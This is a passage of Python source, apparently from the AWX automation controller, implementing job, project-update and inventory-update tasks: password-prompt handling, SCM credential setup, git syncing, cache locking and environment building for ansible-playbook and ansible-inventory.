d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
            logger.info('Mounting insights directory %s into the execution environment', insights_dir)
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
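        # at this point sync_needs might look like ['update_git', 'install_roles', 'install_collections']
        # (illustrative); it is passed as job_tags to the local project update created below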
if sync_needs:
pu_ig = job.instance_group
pu_en = Instance.objects.me().hostname
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
            sync_metafields['scm_clean'] = True # to accommodate force pushes
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
create_partition(local_project_sync.event_class._meta.db_table, start=local_project_sync.created)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
        # Case where a local sync is not needed: the local tree is up to date with the
        # project, so the job runs the project's current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
            # run inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
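                    # for svn the credentials travel via extra_vars instead, so the password is
                    # kept out of the URL that update_scm_url builds below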
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
if settings.IS_K8S:
instance_group = InventoryUpdate(inventory_source=inv_src).preferred_instance_groups[0]
else:
instance_group = project_update.instance_group
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
create_partition(local_inv_update.event_class._meta.db_table, start=local_inv_update.created)
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
            # local_path may have been blanked by a migration or for some other reason; it is recoverable by saving the instance
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
        # the project update playbook is not in a git repo, but lives in a vendored directory;
        # to be consistent with the ansible-runner model, it is copied into the runner
        # project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
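            # the destination is now a shallow, single-commit checkout pinned to p.scm_revision;
            # history beyond that commit is intentionally not copied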
            # submodules are copied in a loop because shallow clones from local HEADs are ideal,
            # and no git clone submodule options are compatible with the minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders are copied to the durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
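# --- Illustrative sketch, not referenced by the tasks above ---
# clear_project_cache() removes stale cache entries with an "invalidate, then delete" idiom:
# the directory is first renamed to a tombstone name (one atomic step on the same filesystem,
# which hides it from readers immediately) and only then recursively deleted. The helper below
# shows that idiom in isolation; it reuses this module's os/shutil/logger and the entry name
# passed in is hypothetical.
def _remove_cache_entry_safely(cache_dir, entry):
    old_path = os.path.join(cache_dir, entry)
    new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
    try:
        # Rename first so concurrent readers never see a half-deleted cache under its usual path
        os.rename(old_path, new_path)
        # The slow recursive delete then happens on the hidden copy
        shutil.rmtree(new_path)
    except OSError:
        logger.warning(f"Could not remove cache directory {old_path}")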
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
if 'ANSIBLE_COLLECTIONS_PATHS' in env:
paths = env['ANSIBLE_COLLECTIONS_PATHS'].split(':')
else:
paths = ['~/.ansible/collections', '/usr/share/ansible/collections']
paths.append('/usr/share/automation-controller/collections')
env['ANSIBLE_COLLECTIONS_PATHS'] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join(CONTAINER_ROOT, rel_path)
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, 'inventory', injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = os.path.join('inventory', injector.filename)
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=Instance.objects.me().hostname,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
